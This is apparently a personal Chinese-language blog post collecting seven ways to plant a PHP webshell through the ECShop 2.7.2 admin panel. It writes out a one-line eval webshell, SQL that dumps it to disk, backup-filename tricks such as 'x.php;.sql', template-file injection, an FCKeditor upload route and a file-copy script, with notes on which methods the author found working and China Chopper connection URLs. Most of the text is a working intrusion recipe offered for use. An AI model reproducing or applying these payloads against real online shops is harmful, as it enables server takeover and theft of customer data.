最近想弄个ecshop做销售。装好ecshop V2.7.2版本之后,测试后台拿shell。本人整理给自己看的,大家飘过就好。BY:黑猫ecshop后台拿shell 个人总结七种方法一、(本人测试已经失效)系统==>数据库管理==>sql查询(可爆出物理路径):==============创建表失败,导不出shell======================show databases;use 数据库名;create a(cmd text not null);insert into a(cmd) values(<?php eval($_POST[cmd]);?>);select cmd from a into outfile 导出路径;drop table if exists a;
==================创建表失败,导不出shell===================二、(本人测试已经成功)前台留个言,内容是我们的一句话木马:<?php eval($_POST[cmd]);?> 接着在后台系统==>数据库管理==>数据备份==>选择自定义备份,选择ecs_feedback这张表(存放留言的表)备份文件名:x.php;.sql (x.php.sql形式出错,菜刀链接不成功)然后菜刀链接成功http://www.hacker8.info/data/sqldata/x.php;.sql三、(本人测试已经成功)1、添加会员,会员名称插入插入一句话 :<?php eval($_POST[cmd]);?> ,其他随便填写。2、系统==>数据库管理==>数据备份—自定义备份—选“XXX_users” (其中XXX因各站而异,是数据前缀) 3、备份文件名为mm.php;.sql4、一句话客户端连接mm.php;.sql,地址一般为 http://www.XXX.com/data/sqldata/mm.php;.sql
四、(本人测试已经成功)模板管理==>库项目管理==>选择myship.lbi 配送方式。在文件内容最后面加入一句话代码:<?php eval($_POST[cmd]);?>菜刀链接http://www.hacker8.info/myship.php 成功。说明:有些服务器过滤了eval 导致失败。
五、(发布权限)(本人测试已经失效)http://url/includes/fckeditor/editor/filemanager/connectors/test.html代码省略对Media 没有任何限制. 直接 Type=Media 上传 你的 解密webshell访问路径为http://url/images/upload/Media/xxx.php六、(测试成功,别人2011.02.05的记录)上传txt 并且没有过滤任何函数.于是运用到了php的文件操作…<script language=”php”>$file = file_get_contents(“C:Inetpubwwwrootecshopdata/Article/1286344719152816497.txt”);if($file){$file = “C:Inetpubwwwrootecshopdata/Article/1286344719152816497.txt”;$newfile = ‘C:Inetpubwwwrootecshopdata/distant.php;a.txt’;copy($file,$newfile);}</script>将以上代码插入库项目管理中的myship.ini打开http://url/myship.php即在http://url/data/目录下生成distant.php;a.txt菜刀连接之…搞定..
七、(本人测试已经失效)进入后台-系统设置-Flash播放器管理- 直接上传x.php ecshop V2.7.2 版本已经没有这个选项 ,所以这个已经失效。
最快乐的时候,就是去旅行。